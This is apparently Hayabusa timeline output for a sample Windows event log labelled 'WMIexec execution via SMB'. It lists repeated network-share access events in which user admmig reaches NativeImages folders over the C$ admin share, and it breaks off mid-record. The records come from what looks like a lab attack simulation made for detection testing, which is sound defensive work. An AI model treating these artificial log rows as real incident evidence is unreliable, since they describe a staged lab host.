SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution 
via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 | IP Addr: 10.23.23.9 | 
LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 | IP Addr: 10.23.23.9 
| LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc | IP Addr: 
10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V4381984f#\07b01287acdaf4ef356c3918db535afd | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vb0a86591#\a45750f13b28bdd0fb2adff38d6cd46f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Vf4833439#\fdcc95e5c05a2fec4f9c33b7e325ccd8 | 
IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.VisualC\999abcb4ea322b606c8f211d12ccb5a0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W0bb5dac4#\f5bca9052007da4e51412dc152a52942 | IP 
Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2bac6884#\26a1a0abca839c13b1337a076531d7a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d29a719#\d0b3dad21720f265098f1e94984349f8 | 
IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2d6979e4#\3e37b5062bf0419283b3384af5deb445 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.937 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W2ded559f#\7d512c9625a371ff23fac5628a0e68f9 
| IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.953 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.W3cdb5602#\6423a4306ce0876f0093a7f421bb7e5a | IP Addr: 10.23.23.9 | LID: 